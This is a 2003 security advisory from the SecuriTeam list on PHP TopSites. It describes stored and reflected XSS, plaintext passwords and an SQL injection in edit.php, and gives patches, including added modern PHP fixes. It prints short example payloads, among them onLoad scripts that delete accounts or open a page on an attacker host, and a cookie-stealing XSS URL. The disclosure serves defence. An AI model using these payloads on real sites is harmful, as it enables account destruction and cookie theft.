[UNIX] Multiple Vulnerabilities Found in PHP "Topsites"

From: support@securiteam.com
Date: 01/21/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 21 Jan 2003 18:00:55 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Multiple Vulnerabilities Found in PHP "Topsites"
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.itop10.net/products/> PHP TopSites is a PHP/MySQL-based
    customizable TopList script. Main features include: easy configuration via
    a config file; MySQL database backend; unlimited categories; site rating on
    incoming votes; special rating from the webmaster; anti-cheating gateway;
    random link; lost password function; webmaster site approval; edit site;
    processing-time display; cookie-based anti-cheating; site reviews; Linux
    cron free; frame protection and much more.

    Multiple security vulnerabilities have been found in the product and they
    are listed below.

    DETAILS

    Critical XSS Vulnerability in all versions of PHP TopSites
    Script:
     * Add.php

    Because PHP TopSites does not have session authentication, an attacker can
    use an XSS vulnerability to delete, edit, and change user accounts by
    having an unknowing admin run the code. Further, by putting it in the
    description field (while adding a new website), it would be almost
    impossible for any admin not to run the code.

    The following code is executed when the admin loads the page. He doesn't
    have to do anything but load the page.

    Examples:
    <body onLoad=
    "parent.location='http://www.somewebsite.com/TopSitesdirectory/seditor.php?sid=siteidnumber&a=delete
     
    This code will effectively delete the user account with the site id number
    as soon as the admin loads the page.
     
    <body onLoad="window.open('http://attackerswebsite/launcher.htm')">
     
    Using this code, an attacker can open a popup window to a page on his site
    that contains code opening several more popup windows. Each window can be
    used to delete a site from the PHP TopSites database. Using this method,
    the entire TopSites database can be cleared.
     
    Patch:
    To fix this vulnerability open add.php and find:
    if (!$name) { $err.= "Please enter your name.<BR>"; }
    if (!$passw) { $err.= "Please enter password.<BR>"; }
    if (!$email) { $err.= "Please enter your email address.<BR>"; }
    if (!$title) { $err.= "Please enter site title.<BR>"; }
    if (!$url) { $err.= "Please enter site url.<BR>"; }
    if (!$banner_w) { $err.= "Please enter banner width.<BR>"; }
    if (!$banner_h) { $err.= "Please enter banner height.<BR>"; }
    if (!$description) { $err.= "Please enter site description.<BR>"; }
    if (!$category) { $err.= "Please enter site category.<BR>"; }
    if (check_email_addr($email) == 0) { $err.= "Please enter valid email address.<BR>"; }
     
    Replace it with:
    ///////////////////////////////////////////////////////////////////////////
    // Critical XSS Vuln Fix By JeiAr = (jeiar@kmfms.com) January 12 2003 - All Versions PHP Topsites //
    ///////////////////////////////////////////////////////////////////////////

    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $name)) {$err.= "Please enter A valid Name.<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $passw)) {$err.= "Please enter A valid Password<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $title)) {$err.= "Please enter A valid Title<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $linkback)) {$err.= "Please enter A valid Linkback<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $url)) {$err.= "Please enter A valid URL<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_url)) {$err.= "Please enter A valid Banner URL<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_w)) {$err.= "Please enter A valid Banner Width<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_h)) {$err.= "Please enter A valid Banner Height<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $description)) {$err.= "Please enter A valid Description<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $category)) {$err.= "Please enter A valid Category<BR>";}
    ///////////////////////////////////////////////////////////////////////////
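    The ereg() patch above anchors every pattern with `$`, so it inspects only the last character of each field; what actually neutralises stored script is validating whole values and HTML-encoding them when the admin panel renders them. The following is an added example, not code from the advisory or from PHP TopSites: the field names follow add.php, while the length limits, the allowed URL schemes and the sample submission are constructed assumptions.

```php
<?php
// Added example, not code from the advisory or from PHP TopSites.
// Validates each add.php field as a whole value (the ereg() patch above only
// tests the final character) and HTML-encodes stored values when they are
// rendered, so markup in the description field is displayed, not executed.

function validate_site_fields(array $in): array
{
    $err = [];
    // Free-text fields: non-empty, bounded, and free of tag characters/controls.
    foreach (['name', 'title', 'category', 'description'] as $f) {
        $v = trim($in[$f] ?? '');
        if ($v === '' || strlen($v) > 500 || preg_match('/[<>\x00-\x1f]/', $v)) {
            $err[] = "Please enter a valid $f.";
        }
    }
    // Site URL must parse and use http or https (no javascript:/data: schemes).
    $url = $in['url'] ?? '';
    if (filter_var($url, FILTER_VALIDATE_URL) === false
        || !in_array(parse_url($url, PHP_URL_SCHEME), ['http', 'https'], true)) {
        $err[] = 'Please enter a valid URL.';
    }
    // Banner dimensions: decimal digits only, within a plausible range.
    foreach (['banner_w', 'banner_h'] as $f) {
        $v = (string)($in[$f] ?? '');
        if (!ctype_digit($v) || (int)$v < 1 || (int)$v > 2000) {
            $err[] = "Please enter a valid $f.";
        }
    }
    if (filter_var($in['email'] ?? '', FILTER_VALIDATE_EMAIL) === false) {
        $err[] = 'Please enter a valid email address.';
    }
    return $err;
}

// Output encoding for the admin panel: apply to every stored value at render
// time, so even a value that slipped past validation cannot run as script.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
// Constructed sample submission carrying markup in the description field.
$submission = [
    'name' => 'Alice', 'email' => 'alice@example.org', 'title' => 'My Site',
    'url' => 'https://example.org/', 'banner_w' => '468', 'banner_h' => '60',
    'category' => 'Games', 'description' => '<body onLoad="alert(1)">',
];
foreach (validate_site_fields($submission) as $e) { echo $e, "\n"; }
echo '<td>', h($submission['description']), "</td>\n";
```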

    XSS Vulnerability in all versions of PHP TopSites
    Script:
     * help.php

    Because PHP TopSites does not have session authentication, it allows an
    attacker to use an XSS vulnerability to steal cookies or other
    user-supplied information. The following example illustrates the
    vulnerability found in help.php.

    Example:
    http://somewebsitesite/TopSitesdirectory/help.php?sid=>alert(document.cookie)</script>

    Plaintext Password Disclosure Vulnerability in all versions of PHP
    TopSites
    Script:
     * seditor.php

    No current versions of PHP TopSites encrypt user passwords, and these
    plaintext passwords can be viewed by anyone with access to the admin panel
    or edit.php page.

    Any TopSite admin (or intruder) could use the user-supplied password to
    try to compromise the security of the user-supplied website and/or the
    user-supplied email account.

    Therefore, anyone signing up for a TopList using PHP TopSites should keep
    this in mind, and it should also be noted to anyone using the same
    password for everything, that this is generally not a very good habit to
    have.

    This vulnerability affects all versions. A suggestion to the developer
    would be to hash the passwords with md5, and not to display the password
    to an admin when editing TopList user(s).
     
    PHP TopSites User Account Compromise Vulnerability in All Pro versions and
    in 1.xx Free versions
    Script:
     * edit.php

    This is exploitable if the following two conditions are met:
    First, the register_globals parameter is on in php.ini, which automatically
    turns every request variable into a global variable.
    Second, the underlying database is MySQL, which does not require numeric
    criteria in the SQL statement to be quoted.

    If both are met, an attacker can bypass PHP's magic_quotes_gpc protection
    by manipulating the numeric parts of a query.

    An example against edit.php is listed below.
    http://examplewebsite.com/topsitesdirectory/edit.php?a=pre&submit=&sid=siteidnumber
     
    This SQL injection negates the use of a password and provides access to
    the TopList edit page. All information about a particular site can be
    viewed and edited from this page.

    Note that the password is also displayed in plaintext on this page. All
    users of the 1.XX Free script(s) are urged to upgrade their scripts as soon
    as possible. If you are not able to upgrade, the code below should serve as
    a quick fix.

    Patch:
    In the edit.php file change:
    $query = mysql_db_query ($dbname,"Select * from top_user Where sid=$sid AND password='$passw'",$db) or die (mysql_error());

    To:

    $query = mysql_db_query ($dbname,"Select * from top_user Where sid='$sid' AND password='$passw'",$db) or die (mysql_error());
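    Quoting $sid still leaves the query built from user input. As an added example covering both the edit.php query above and the plaintext-password issue in the previous section (not code from the advisory or from PHP TopSites), the lookup below uses a mysqli prepared statement (mysql_db_query no longer exists in PHP) and password_hash() instead of the md5 the advisory suggests. It assumes a mysqli connection with the mysqlnd driver and a top_user table with the sid, name and password columns the advisory's query implies.

```php
<?php
// Added example, not code from the advisory or from PHP TopSites. Replaces the
// edit.php lookup with a mysqli prepared statement (mysql_db_query no longer
// exists) and a hashed password: sid is bound as an integer and the password
// never enters the SQL text, so register_globals and quoting rules cannot
// alter the query, and the edit page never receives a plaintext password.

function find_editable_site(mysqli $db, $sid, string $passw): ?array
{
    // Accept only a plain positive integer for sid; anything else is rejected
    // before it reaches SQL.
    if (!is_scalar($sid) || !ctype_digit((string)$sid) || (int)$sid < 1) {
        return null;
    }
    $id = (int)$sid;

    $stmt = $db->prepare('SELECT sid, name, password FROM top_user WHERE sid = ?');
    $stmt->bind_param('i', $id);                 // bound as integer, not text
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // needs mysqlnd
    $stmt->close();

    // password column holds a password_hash() digest; verify in constant time.
    if ($row === null || !password_verify($passw, $row['password'])) {
        return null;
    }
    unset($row['password']);   // the edit page gets site data, never the credential
    return $row;
}

// Called from add.php on signup and whenever a password is changed: store the
// hash, never the plaintext the advisory describes.
function store_password_hash(mysqli $db, int $sid, string $passw): void
{
    $hash = password_hash($passw, PASSWORD_DEFAULT);
    $stmt = $db->prepare('UPDATE top_user SET password = ? WHERE sid = ?');
    $stmt->bind_param('si', $hash, $sid);
    $stmt->execute();
    $stmt->close();
}

// Usage in edit.php, assuming $db is an open mysqli connection to $dbname:
// $site = find_editable_site($db, $_GET['sid'] ?? '', $_POST['passw'] ?? '');
// if ($site === null) { die('Authentication failed.'); }
```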

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:paragod@phreaker.net>
    Cyberarmy Application and Code Auditing Team.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.